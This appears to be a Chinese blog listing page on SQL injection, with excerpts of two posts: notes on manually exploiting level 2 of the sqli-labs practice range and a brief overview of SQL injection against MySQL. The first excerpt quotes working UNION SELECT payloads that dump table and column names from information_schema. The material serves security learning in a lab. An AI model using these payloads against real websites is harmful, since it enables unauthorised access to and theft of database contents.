SQL注入
关注
分享
扫一扫
木南瓜
爱学习
展开
-
sqli-labs靶场第二关手工盲注记录
id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= database() //group_concat()去重分组的功能。union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273//将user改成16进制表达。原创 2023-03-05 17:38:07 · 150 阅读 · 0 评论 -
SQL注入(injection)概述
SQL注入是指web应用程序对用户输入数据的合法性没有判断或者过滤不严,攻击者可以在web应用程序中实现定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,依次来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。//查询所有的数据库 use 数据库名称 //选中某个表。2.前面的查询语句的字段数量和后面的查询语句字段数量要一致。schemata:保存当前整个服务器所有的数据库信息 库名。1.前面的查询语句和后面的查询语句互不干扰。Mysql数据库的注入。原创 2023-03-05 17:35:53 · 198 阅读 · 0 评论